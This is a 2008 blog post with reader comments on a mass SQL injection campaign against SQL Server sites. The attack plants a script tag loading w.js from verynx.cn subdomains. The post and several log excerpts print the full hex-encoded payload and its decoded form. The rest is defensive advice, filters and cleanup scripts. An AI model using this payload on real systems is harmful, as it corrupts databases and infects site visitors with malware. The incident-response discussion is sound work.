SQL Injection Hack using CAST from 1.verynx.cn
Update
If the attack has changed to a different URL simply replace the URL in the solution script below. That is assuming the rest of the syntax has not changed.
Hope that helps
A new SQL injection hack seems to be out in the wild from verynx.cn. The SQL Injection hack uses a CHAR array to hide its payload which will insert some various html garbage along with a reference to a javascript file on the verynx.cn domain that will infect users when they visit your website. Luckily the domain with the offending javascript file now points to 127.0.0.1 which will help stop the spread of the virus. Unfortunately the botnet still seems to be spamming websites with the scripted attack leaving many entirely broken or loading extremely slow as each page might have hundreds of requests to the payload.
The attack below works like this:
You have a web page like www.mywebsite.com/showproducts.aspx?categoryId=12. An attacker visits your website with SQL code appended to the number 12 in the sample URL provided. A simple attack would look like www.mywebsite.com/showproducts.aspx?categoryId=12;SELECT * from tblProducts;. As you can see the attacker is guessing at the table name and hoping to get all of the information dumped back to them when you pass the categoryId to the database. Below you can see a much more complicated attack where they’ve used a CHAR array and then used the CAST command to have your SQL Server convert the array so it can be executed.
Sample of Attack:
;DECLARE
%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535
292C4043207661263686172283430303029204445434C415245205461626C655F437572736F7220
435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D2073797
36F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420
616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747
970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50
454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4
37572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30
2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432
B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D226874
74703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2727207
76865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C73637269
7074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7323E3C2F7363726970
743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F722
0494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C
4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);
Un-Obfuscated Attack:
;DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://1.verynx.cn/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://1.verynx.cn/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
Tips to prevent SQL Injection Hacks:
Do not trust user data. The easiest solution for resolving most issues with SQL Injections is to clean all incoming data. For any type of number or ID this is pretty easy as you can ensure any incoming number safely converts to a number (int for example) alternatively you can ensure other ID’s such as GUID’s convert safely to GUID’s before passing any information to your database.
Another simple fix – if you don’t need execute – ensure the user connecting to your database doesn’t have execute permissions.
Solution (Fixing your database after the attack):
Here we turn their code into the solution as we use the same process to loop through the entire database and remove what they’ve inserted into the database.
DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=replace(['+@C+'],''"></title><script src="http://1.verynx.cn/w.js"></script><!--'','''')')
FETCH NEXT FROM Table_Cursor INTO @T,@C END
CLOSE Table_Cursor DEALLOCATE Table_Cursor
Additional Links:
All the details you need to understand SQL Injection: http://en.wikipedia.org
SQL Injection Cheat Sheet: http://ferruh.mavituna.com
SQL Injection Attack Detection Tools: http://52coding.com
Essential Security Considerations: http://nettuts.com
PHP+Mysql tips for preventing SQL injections: http://www.johnrockefeller.net
What to do if you’re still stuck:
Post your questions in the comments below and we will answer them as quickly as possible – also if anyone has any useful information we will update the article to share that information with others.
Subscribe to:
July 22nd, 2008 at 9:54 am
Our website was hit with this injection attack yesterday. Before the verynx.cn domain was shut down, what would happen to a user who visited our website, in case we start getting calls from people wondering if they received a virus or wondering if their credit card information is safe?
Also, this attack seems to have targeted ColdFusion sites specifically, and the first recommendation I found was to make sure you are using . I’m surprised this wasn’t mentioned under how to prevent SQL injection hacks.
July 22nd, 2008 at 10:48 am
From our digging the domain verynx.cn isn’t actually down, but the offending sub domain 1.verynx.cn is down – and as far as we are aware it was down all day yesterday.
We did however manage to dig up at least a portion of the payload. If for some reason users had it the infected website while the payload was available it would have installed a virus on their computer.
We’ll leave out the details of how the payload was loaded onto the users computer as theres no need to spread that type of information.
Marc it looks like in your sentence about “the first recommendation I found was…” is missing the last word? We’re assuming your going to suggest a cold fusion specific function to clean the input?
Please clarify and we will gladly update the article.
Thanks
July 23rd, 2008 at 7:28 am
Thanks Marc – We believe you’re correct – This attack appears to be directly targeted at coldfusion.
We believe the command you left out above was the cfqueryparams function.
Thanks for the tip,
Devit
July 23rd, 2008 at 8:05 am
For the less versed among use, can someone expand on the statement above as to how to “ensure the user connecting to your database doesn’t have execute permissions.”. How can i tell “which user is connecting to my database”? And, “doesn’t have execute permissions” where? In SQL, IIS, Coldfusion?…
July 23rd, 2008 at 8:53 am
For those running IIS, a quick fix for the current attack vector is to install ISAPI_Rewrite (http://www.helicontech.com — get the latest version for free, applies rules to all websites on the server), and create a regex rule that kills the request based on the known format of the attack. For example, the attack string contains “char(4000)” or “CHAR%284000%28″ in the query string… so my config file for ISAPI_Rewrite looks like this:
# Helicon ISAPI_Rewrite configuration file
# Version 3.0.0.25
RewriteEngine on
RewriteCond %{QUERY_STRING} .*char\(4000\).* [NC]
RewriteRule . – [F]
RewriteCond %{QUERY_STRING} .*CHAR%284000%28.* [NC]
RewriteRule . – [F]
Stops the attack cold, before your application server even tries to execute.
Of course, this is a bandaid approach; one change to the attack string, and you’re vulnerable yet again. Proper user data validation and use of CFQUERYPARAM are the real answers… but for those that have to support older apps, or have a ton of code to go through, this can at least put a stop to the current threat… and it gives you quick a server-wide solution for stopping similar threats you may face while you fix your code.
Apache users can obviously use mod_rewrite to accomplish the same goal.
HTH
July 23rd, 2008 at 9:49 am
We were hit by these guys back in May on a classic ASP site. I think there might be more to how they went about the deed, because I am guessing that they started by running a query to list all table names. At least, I think that’s how they figured out the syntaxt for the actual injection.
July 23rd, 2008 at 11:56 am
Hi there. Thanks for the info on this. We’ve been hit with this repeatedly over the last 4 days. We’re scratching our heads as to how it’s getting in. We found one likely place, and closed that door, but it was back within 24 hours. We’re searching for more leaks in our coding… We are on a Cold Fusion platform also.
One thing we did was build a little function looking for the following terms in user entry:
declare
execute
select
varchar
We are logging those source IPs to a table and throwing CFABORT immediately for any subsequent traffic. Not really helpful. We collected over 10,000 unique IP addresses in 24 hours, and were attacked again.
Our symptoms have been the same as mentioned here. This little attack appends a javascript to the end of just about every field in every table (varchars). The js in our database today was pointed at http://abc.verynx.cn/w.js – but it’s been a different subdomain each time.
July 23rd, 2008 at 12:59 pm
This code worked excellent – it stripped all records of 1.verynx
am i missing something?
HOWEVER as of 16:37 pm 23 July (got hit earlier with 1.verynx) – its hit again, this time using abc.verynx.cn – i tried ammending the above script to find abc.verynx instead but it wont work
July 23rd, 2008 at 1:54 pm
OK, this is getting rediculous. I have been hit with this 3 times, twice today alone. The latest redirect is to “abc.verynx.cn”.
July 23rd, 2008 at 3:03 pm
Hi,
If someone had been to a site that’s infected by the 1.verynx.cn (virus?) would a commercial virus program be able to detect it and remove it? Like Norton, Zone Alaram, Kaspersky, etc…? And yes I’ve watched the DNS go from 127.0.0.1 to other values that work! It’s still out there and going on! Patch your sites!
Thanks,
Frank
July 24th, 2008 at 1:41 am
Hi, devit To prevent a coldfusion http://pcsilva.blogspot.com/2008/07/sql-injection.html .
For other languages can transcribe, of course remember to add the name of the friend.
July 24th, 2008 at 2:12 am
Earlier today I experienced this injection and repaired it. Then it occurred again, this time the sub domain in the code changed to abc.verynx.cn. Is this one down as well? I have repaired it again (thanks to the tip above which eliminated the need to restore a backup) but I obviously need to get to work on my CF scripts to prevent this. Not even sure where to start..
July 24th, 2008 at 4:27 am
I have done some digging around on this subject since my server was attacked yesterday and found:
1.verynx.cn points to 127.0.0.1 and is blocked by Firefox (at least version 3) but not Internet Explorer.
Following CF at the top of your application.cfm page is quite efficient against any kind of injection attacks (at least as far as I now know):
I may have been a little overcautious with maybe too long a list, but I’m rather safe than sorry. If anyone has a better idea??
I used HP Srawlr 1.0 to scan my site for vulnerabilities and found that cfqueryparam alone isn’t enough.
July 24th, 2008 at 5:12 am
We just had an attack on our server today. It wasn’t a coldfusion one, it was MSSql Server one. I was just wandering how these guys get into the db and update EVERY field??!!
i created a script to remove it. hopefully this might help somebody out there with removing the code that was inserted into their db:
update TABLENAME
set FIELDNAME = replace(FIELDNAME,’”>
July 24th, 2008 at 5:32 am
I did get this from other IPs starting 24 July. Looks like it is moving. IPs from USA and Canada, I am currently counting up to 4 different ones.
July 24th, 2008 at 9:51 am
Our system was not SQL Injection proof and we recently suffered an attack that corrupted the data in some of our database tables. The attack was quite elegant and fortunately did not cause severe damage other than the appending of a SCRIPT sting to a bunch of VARCHAR fields. This was meant to actually execute a JS file and this qualifies as a XSS attack.
In researching the Web for a solution for the problem, and a way to immunize our CF application against further attacks, we came across the CFQUERYPARAM solution, but our application has over 5000 files, each with one or more Queries and Stored Procedure calls. Implementing such a solution in such an extensive amount of files was impossible in a timely fashion, so I looked for another solution and came across a ColdFusion written function (isSqlInjection) that showed some promise but some shortcomings as well.
I wanted something that we could deploy fast and that would immunize the entire application in one single swoop.
As far as I understand, SQL injections can come from either FORM fields or from URL passed variables. Therefore we developed a function that was placed in our application.cfm and therefore used by all our CFM files. The function used a custom developed Regular Expression to check all URL and FORM fields for possible SQL Injections.
We were able to develop this in one day and implement it immediately. That same night we were able to catch and prevent 2 more SQL Injection attempts.
We have since improved the script and it now does the following:
• Checks all FORM and URL input for SQL injection code
• Interfaces (CFHTTP) with ARIN WHOIS Database Search (http://ws.arin.net/whois/) to get ISP information for the offender’s IP.
• Automatically sends an abuse report to the ISP concerning the attack.
• Displays a message informing the hacker that the attack was logged, that his/her ISP was contacted and that he/she is breaking the law
• Sends us an email with the SQL Injection string, IP address and other information.
• Stores the hacker’s IP address in an APPLICATION array (Black List).
o Each time a page in our application is requested, the IP address (CGI.REMOTE_ADDR) is compared with those in the Black List and if it is present, page execution is halted right at the application.cfm level returning a blank page to the browser
o Black List entries that are older than one hour are cleared by a scheduled task on an hourly basis.
We are making this code available to other CF developers for free. Please request a copy by email. luism@grouptraveltech.com.
If after receiving it you have suggestions or improvements, please send them my way as well.
July 24th, 2008 at 1:17 pm
The company I contract for was hit with this. It appended the script to every varchar/text field. Thanks for a look at the unobfuscated code. I got here searching on 1.verynx.cn/w.js and so to others who do the same:
as mentioned above, cfqueryparam is good for escaping all data,ie:
cfqueryparam value=”#FORM.first_name#” cfsqltype=”CF_SQL_VARCHAR”
cfqueryparam value=”#URL.id” cfsqltype=”CF_SQL_INTEGER”
Our (naive) mistake was in believing that only input/form data was vulnerable – and not dynamic urls that pull simple select statements.
Other solutions might involve creating a read-only db user for any read only areas, scanning the db at intervals for script/object/iframe etc.
I also found a script that runs through and examines all your queries to make sure they’re parameterized which we found useful:
http://www.cfprimer.com/downloads.cfm
My php/mysql sites were also hit (but failed, fortunately) – while the above targets SQL Server, I read somewhere else that there’s a working MySQL version of this.
I believe the js installed a zombie virus, to be called upon to propagate the attack. Tracing the IPs where we were getting hit from, many were from cable connections in the states. Very sci fi.
July 24th, 2008 at 7:37 pm
Help Please
I have seen this in my log files
called ipower and linked them this site still no help
have a look at the latest logs
started last night
59.36.21.120 – - [23/Jul/2008:12:54:39 -0400] “GET /?’;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0×4445434C415245204054207661726368617228323535292C40
432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073
656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E732
06220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D393
9206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F504
54E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544
F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E2065786563282775706461746
5205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C7363726
97074207372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2
72720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633
D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D27272729464554
4348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F53452054
61626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);
HTTP/1.1″ 200 18806 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”
59.36.21.120 – - [23/Jul/2008:12:54:39 -0400] “GET /?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0×4445434C415245204054207661726368617228323535292C40
432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073
656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E732
06220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D393
9206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F504
54E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544
F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E2065786563282775706461746
5205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372
697074207372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2
D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C7363726970742073726
33D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D272727294645
544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F534520
5461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);
HTTP/1.1″ 200 18806 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”
Then today ::
59.6.82.62 – - [24/Jul/2008:07:59:25 -0400] “GET / HTTP/1.1″ 403 825 “-” “Microsoft URL Control – 6.00.8169″
208.80.193.40 – - [24/Jul/2008:08:00:13 -0400] “GET / HTTP/1.0″ 200 36899 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SIMBAR Enabled; SIMBAR={CF07971C-C698-451d-BAB9-18491326916A}; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; Media Center PC 2.8; MEGAUPLOAD 1.0)”
208.80.193.36 – - [24/Jul/2008:13:02:02 -0400] “GET / HTTP/1.0″ 200 36899 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; bgft; ZangoToolbar 4.8.2)”
WTF is this?
July 24th, 2008 at 7:38 pm
thank you
July 24th, 2008 at 8:25 pm
Our site has been hit multiple times with this as well. Thanks for posting the solution for cleaning up the mess. I’ve spent countless hours on this over the past few days.
July 24th, 2008 at 10:55 pm
Here’s some pretty simple injector projection code that I implemented into my application.cfm file It’s been effective so far in blocking out further hacking attempts and since it emails me the details on the perp, I can block the IP and notify the ISP.
SQL INJECTION PROTECTOR CODE (stored in /application.cfm)
========================================================
HACK ATTEMPT RECORDED FROM IP: #remote_addr#
#DateFormat(Now(), “MM-DD-YYYY”)# @ #TimeFormat(Now(), “HH:MM:SS”)#
#script_name#&#query_string#
HACK ATTEMPT RECORDED:
#DateFormat(Now(), “MM-DD-YYYY”)# @ #TimeFormat(Now(), “HH:MM:SS”)#
IP: #remote_addr#
ATTEMPT:
http://#server_name#/#script_name#&#query_string#
July 24th, 2008 at 10:57 pm
SQL INJECTION PROTECTOR CODE (stored in /application.cfm)
=======================================================
<cfparam name=”query_string” default=”">
<cfif query_string contains “SELECT” or query_string contains “EXECUTE” or query_string contains “DECLARE” or query_string contains “VARCHAR” or query_string contains “CONVERT”>
<cfoutput>
<pre>
<h1>HACK ATTEMPT RECORDED FROM IP: #remote_addr#</h1>
#DateFormat(Now(), “MM-DD-YYYY”)# @ #TimeFormat(Now(), “HH:MM:SS”)#
#script_name#&#query_string#
</pre>
</cfoutput>
<cfmail
to=”mark@warrick.net”
from=”webmaster@zapconnect.com”
subject=”HACK ATTEMPT FROM IP: #remote_addr#”>
HACK ATTEMPT RECORDED:
#DateFormat(Now(), “MM-DD-YYYY”)# @ #TimeFormat(Now(), “HH:MM:SS”)#
IP: #remote_addr#
ATTEMPT:
http://#server_name#/#script_name#&#query_string#
</cfmail>
<cfabort>
</cfif>
========================================================
July 25th, 2008 at 12:41 pm
Using CFIF it is a small security against the hack, it gonna filter only those KEYWORDS somebody can come up with other code and you done. What I suggest is if u not using EXECUTE remove it from permissions in DB, and the most important thing is using cfqueryparams:
select name from product where productoid=
select name from product where variable=
For more security ADD MAXLENGHT:
select name from product where productoid=
select name from product where variable=
I know it is time consuming to check all your queries, but here is a great tool to check them and easily fix them and u secured forever !!!!
http://qpscanner.riaforge.org/
Very great tool!
July 25th, 2008 at 12:42 pm
The blog is cutting the queries dont know why:
“select name from product where productoid=”
“select name from product where variable=”
For more security ADD MAXLENGHT:
“select name from product where productoid=”
“select name from product where variable=”
July 25th, 2008 at 2:55 pm
I recently recovered from the abc.verynx.com strain. I found the above scripts did not completely clear up my issues. every databases INFORMATION_SCHEMA.COLUMNS table was injected in the DATA_TYPE column. I used a simple find and replace script on that particular field to remove the code from the DATA_TYPE field. perhaps the above removal script can be modified to check this table as well.
John Bell
July 25th, 2008 at 4:22 pm
Our server was hit by the SQL injection .. Working at an edu our security person refuses to to reattach SQL Server or the webserver …so i can not scrub the data / The network guys have reloaded the webserver OS and applied the patches…
In a SQL Server class i took one guy was suggesting going into SQL server and for the account the webserver is using to attach to the database; with the view sys.sysobjects revoking SELECT access for that user. I have yet to find information that substantiates that mehodology…
ps AGHHH
July 25th, 2008 at 5:53 pm
We also had a ColdFusion site that was hit with this attack. We got the database cleaned up and used CFQUERYPARAM to stop the attacks. However, I have since noticed reduced performance from the SQL Server. There is also an unexplained increase in the database size. Some of the tables are quite large. I’m guessing that temporarily adding content to the database affected the indexes etc. Does anyone have any ideas as to how to return the database to its former level of efficiency?
July 27th, 2008 at 1:20 pm
Thanks for posting this. We have been wrestling with this attack in a classic asp application, and I think we finally have it under control (by finding and filtering all entry points). We’ll now be taking a look at execute permissions.
July 28th, 2008 at 7:11 am
Thank you again for this post. At this point we are wondering if steps need to be taken to help our users recover from this attack. As you state, if a user loaded the payload while the server was online a virus would have been installed on their machine. Is there additional information you can provide about the virus? Is there anywhere we can go to learn more information about the virus? You obviously were able to follow the attack to a point where you were able to learn that a virus would be installed. Any insight you could provide would be very helpful.
July 29th, 2008 at 8:50 am
Thanks for the hints about how to remove the threat, we found Ben’s suggestion to download the file from http://www.cfprimer.com/downloads.cfm extremely valuable!
July 29th, 2008 at 10:53 pm
my site has been overrun by: “http://abc.verynx.cn/w.js”.
My webmaster/host-securenet systems says that the hits have not come from his side but from outside and is my responsibility. Now he wants 2,000.00 to fix with all new codes,etc.
What shall I do?
July 30th, 2008 at 7:33 am
re: Jason Leveille
We believe the virus was a worm. It looks like it could be one of the following:
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM%5FPOPWIN%2ECK&VSect=P
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM%5FNSPAK%2EAB&VSect=P
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM%5FAUTORUN%2ETD&VSect=P
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM%5FSILLY%2EGF&VSect=P
We think a full virus scan would detect anything it may have loaded. We’ve found sometimes if a machine is infected using an online virus scanner such as http://housecall.trendmicro.com can be useful.
Hope that helps.
July 30th, 2008 at 7:40 am
re: Dr. G.
Depending when your webmaster created the code you may be able to push back and get at least some of the cost removed. It’s obviously very hard to give any type of advice with such little information so we won’t even try. What we can comment on is generally there is a warranty period for code. Also you may want to research alternatives such as competitors or try and hold the person who wrote the code accountable for the security problem.
Good Luck.
July 31st, 2008 at 11:19 am
this has been perhaps proposed as well but here is another method at the database level revoking SELECT access of system level views (within SQL Server)
http://dileepstanley.wordpress.com/2008/06/23/prevent-some-of-the-sql-injection-possiblities/
• at the code level we have implemented a sniffer script that looks for common methods (DML functions: SELECT INSERT UPDATE DELETE DROP etc)of attack via FORM and URL variables –
at the server IIS level i have blocked the IPs of sites noted to have possibly propagated injection attacks; while this seems like I am shooting rubber bands at stars [it seems many reference servers in .cn] example of the embedded attack –> script src=”w.js” /script script src=”abc.verynx.cn/w.js” /script * From Microsoft website “Stop SQL Injection Attacks Before They Stop You” http://msdn.microsoft.com/en-us/magazine/cc163917.aspx
August 6th, 2008 at 2:00 am
[...] Injection attack came up. Here’s a post describing it; it also includes other useful links: http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html A search for the query string “http://1.verynx.cn/w.js” (the quotes are part of the [...]
August 7th, 2008 at 4:21 pm
–Try this out if you’ve been hacked. Run this SQL statement in Query Analyzer. Put the garbage you are trying to remove in the @Offending_String variable
DECLARE @Offending_String varchar(4000)
DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR
select a.name,b.name
from sysobjects a,syscolumns b
where a.id=b.id and a.xtype=’u’
and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN
SET @Offending_String = ” –Put the string you want cleared in here
EXEC(‘UPDATE ['+@T+'] SET ['+@C+'] = REPLACE(['+@C+'],’+@Offending_String+’,””)’)
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
August 7th, 2008 at 5:28 pm
We had the same problem and saw this posting:
http://coldfusion.sys-con.com/node/620373
=============================================================================
If you’re using ColdFusion, to harden your website from sql injection attacks add the following code to your Application.cfm file. If you’re not using ColdFusion, you can translate this code into the language you’re using and it should still work.
This code would reside in your Application.cfm file which gets executed every time a ColdFusion file is requested on the server. What it does is it checks all form and URL variables to see if they contain any patterns matching an SQL SELECT, UPDATE, INSERT, DELETE or DROP statement.
If a match is found, the user is redirected to a message page indicating that a possible SQL Injection attack was made and the SQL injection is prevented.
=============================================================================
I hope this will help.
August 8th, 2008 at 8:36 am
[...] which, so far, seems specific for servers with coldfusion. However, according to a visitor to this article the attack had evolved, effecting MSSQL. Here’s a sample of the attack string [...]
August 8th, 2008 at 9:00 am
I found that filtering all special characters in the query string, like any of the following chars: ( ) : ; ‘ as well as the words select, delete, drop, insert does a good job at sql injection attacks. I get an email like the above (22) comment, plus the user get re-routed to a “blocked.html” page. I will probably add the words declare, cast, char, and exec if it doesn’t interfere with the normal operation of my site. My IP blocker code doesn’t work with all of these different IP’s though, so I’m hoping they will just give up soon. So far, I’ve been getting slammed for about 6 hours.
August 8th, 2008 at 4:07 pm
Thanks for the post – sounds like a lot of people have been getting slammed by these bots recently so the info here is very helpful.
One of our ColdFusion sites got hit this week by a SQL injection, but fortunately we were able to restore most of the damaged data from a backup. It was a very large app that was insourced from a former contractor and contained literally thousands of queries with parameters that were all missing cfqueryparam. Although we made efforts to use find/replace to update the code and many previous attacks were trapped, there were unfortunately a few odd places that were missed and one of these was the likely point of entry.
In addition to adding cfqueryparam in remaining templates we implemented a custom tag across the whole site that detects the presence of certain SQL keywords in the query string and immediately aborts the request if a match is found. This is a bit kludgy and far from bulletproof, but it at least provides an additional layer of defense and prevents any data from being served or error logging/notification email to occur.
August 9th, 2008 at 5:37 am
another band aid for those who have loads of old cf apps to look after
http://coldfusion.sys-con.com/node/620373
L
August 11th, 2008 at 12:08 am
Does anyone have more details on the virus? I’ve fixed the vulnerabilities, but I know I’m going to get asked what happened before the site was cleaned up.
August 11th, 2008 at 9:10 am
Thank you Mark. I used your code in applicaiton.cfm and it is now aborting all attempts. I also added logic to log the IP into a table so that if they try to use another query fromt he same IP its aborted as well. Here is the code snippet.
select ip from hacktable where ip =’#trim(remote_addr)#’
HACK ATTEMPT RECORDED FROM IP: #remote_addr#
#DateFormat(Now(), “MM-DD-YYYY”)# @ #TimeFormat(Now(), “HH:MM:SS”)#
#script_name#&#query_string#
insert hacktable (timelogged,siteid,ip) values(‘#DateFormat(Now(),”MM/DD/YYYY”)# #TimeFormat(Now(), “HH:MM:SS”)#’,2,’#remote_addr#’)
August 14th, 2008 at 1:44 pm
this is not just aimed at coldfusion pages. asp is especially vunerable, as is php. i just had an asp.net page hacked to hell every five minutes. i ran this script to reverse it. this script removes all script tags from every text/varchar field in your database.
DECLARE @T varchar(255), @C varchar(255);
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = ‘u’ AND
(b.xtype = 99 OR
b.xtype = 35 OR
b.xtype = 231 OR
b.xtype = 167);
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
EXEC(
‘update ['+@T+'] set ['+@C+'] = left(
convert(varchar(8000), ['+@C+']),
len(convert(varchar(8000), ['+@C+'])) – 6 -
patindex(”%tpircs”’
);
FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;
CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;
August 22nd, 2008 at 12:27 pm
Looks like my message got cut off. My question was whether the solution would work for SQL SERVER 2005 or just SQL SERVER 2000?
August 23rd, 2008 at 4:14 am
Nice article. But where can i get more about input attack in a search box?
thanks
August 23rd, 2008 at 3:32 pm
I came across this exploit attempt in my server logs today, and spent the day investigating. While I wasn’t negatively impacted by the exploit, one thing is still VERY puzzling to me:
Marc Funaro (poster #5 above) indicated that he was able to stop the exploits cold by using ISAPI ReWrite (ISRW) to check for the presence of things like “CAST(4000)” in the URL, etc. I had the same idea, and for some reason, this approach doesn’t work on my end — which is what’s puzzling me… (Server is W2K3, IIS6).
As a test, I put a ReWrite rule in place to redirect any and all requests to my site to a bogus URL like fofofoxoxoxo.com. I then pointed a browser (both IE and FF) to the URL in question:
http://www.mysite.com/Index.htm?‘DECLARE%20@S%20CHAR(4000)…EXEC(@S);
The browsers each sat there for a few minutes, and then timed out. Odd. I chopped the URL down to only:
http://www.mysite.com/Index.htm?‘DECLARE%20@S%20CHAR(4000)
and I was redirected as per my ISRW rule.
My next thought was that perhaps the browsers were getting tripped up with the multiple @ signs in there, trying to resolve some other IP address using the long 0x… CAST as the address. So, I then whipped up a quick C# program to perform the GET requests and dump back the output. Now things got VERY strange…
With the ISRW rule in place still redirecting ALL requests to mysite.com to fofofoxoxo.com, sending the SQL injection request via my C# app still caused the request to timeout, as if something on the server was trying to do something with the request before any of the ISAPI filters. I confirmed that ISAPI_REWRITE was the first filter in the execution chain, and it was(is). So — what the heck is the server doing with the request?
I continued to send variations of the SQL inject string to the server, including:
* One in which I changed CAST to XAST and EXEC to QXEC. Everything else was the same. This request did NOT timeout on the server!
* One in which I changed the contents of the CAST(…) from 0×4445435… to 0×11111… (same length data). This request did NOT timeout on the server!
* Several in which I progressively chopped pieces off the end of the CAST(…) data. After the string got sufficiently short (the exact length, I don’t recall), these requests stopped timing out on the server.
All of this has left me quite puzzled. With ISAPI_REWRITE being the first filter in my list, what exactly is going on on the server end that causes the request to timeout for the SQL inject request in question? Even with a rule in place to redirect ALL requests elsewhere, some requests (like the SQL inject) never get processed. WHY? What is going on?
For reference, here is the C# source for those interested in trying it themselves (replace mysite.com with your own site.)
—-
using System;
using System.Net.Sockets;
public class Client
{
static public void pause()
{
Console.WriteLine( “\r\n***** Done *****\r\n” );
Console.ReadKey();
}
static public void Main(string[] Args)
{
TcpClient socketForServer;
try
{
socketForServer = new TcpClient(“www.mysite.com”, 80);
}
catch
{
Console.WriteLine(“Failed to connect to server at {0}:999″, “mysite.com”);
pause();
return;
}
NetworkStream networkStream = socketForServer.GetStream();
System.IO.StreamReader streamReader =
new System.IO.StreamReader(networkStream);
System.IO.StreamWriter streamWriter =
new System.IO.StreamWriter(networkStream);
try
{
string outputString;
// read the data from the host and display it
{
//streamWriter.WriteLine(“GET / HTTP/1.1\r\nHost: http://www.mysite.com\r\n\r\n”);
//SET%20@S=CAST(0×4445434C415245204054207661726368617228323535292
//C40432076617263686172283430303029204445434C415245205461626C655F437
//572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6
//E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E732
//06220776865726520612E69643D622E696420616E6420612E78747970653D27752
//720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7
//220622E78747970653D323331206F7220622E78747970653D31363729204F50454
